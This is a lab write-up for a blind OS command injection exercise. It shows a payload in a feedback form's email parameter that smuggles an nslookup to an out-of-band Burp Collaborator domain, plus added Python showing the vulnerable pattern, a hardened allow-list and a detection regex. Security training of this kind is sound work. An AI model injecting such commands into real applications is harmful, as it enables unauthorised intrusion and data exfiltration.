LAB 4 - Blind OS command injection with out-of-band interaction

Initial instructions

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

To solve this lab, we first need to submit feedback and intercept the request with Burp Suite.

![[Pasted image 20250405204644.png]]

Once intercepted, we can inject into the email parameter again, this time running an nslookup against our Collaborator domain.

email=test%40test.com||nslookup+w0x37th0w8kqs78syqkbskpgh7nybozd.oastify.com||
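As an added illustration (not part of the lab or PortSwigger's code), the vulnerable pattern behind this bug class beside a hardened form in Python. The `mail` command line, the placeholder domain and the function names are assumptions.

```python
import re
import shlex

# Constructed sample input shaped like the lab payload after URL decoding
# (the domain is a placeholder, not a real Collaborator host).
PAYLOAD = "test@test.com||nslookup placeholder.oast-example.invalid||"


def vulnerable_command(email: str) -> str:
    """Insecure pattern: the untrusted field is spliced into a shell string.
    Returns the string that shell=True would hand to /bin/sh; it is not run
    here. The mail command line is hypothetical."""
    return f"mail -s Feedback -r {email} support@example.com"


def shell_tokens(cmd: str) -> list[str]:
    """Tokenise the way a POSIX shell would, so control operators such as
    '||' become their own tokens and the smuggled command is visible."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


# Allow-list for a plain e-mail address; anything else is rejected outright.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def safe_command(email: str) -> list[str]:
    """Hardened form: validate against the allow-list, then build an argv
    list to pass to subprocess.run() without a shell, so metacharacters in
    the value are never interpreted."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("feedback rejected: not a plain e-mail address")
    return ["mail", "-s", "Feedback", "-r", email, "support@example.com"]


def looks_like_injection(value: str) -> bool:
    """Detection helper for request logs: flags shell control characters in
    a field that should only ever hold an address."""
    return re.search(r"[;&|`$(){}<>\n]", value) is not None
```

The blind variant in this lab leaves nothing in the HTTP response, so a detection rule on the request field (as in `looks_like_injection`) or on outbound DNS from the application host is what a defender has to work with.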

If we open Burp Collaborator in Burp Suite and poll for interactions, we see the following DNS lookup.

![[Pasted image 20250405205042.png]]

Congratulations, you solved the lab!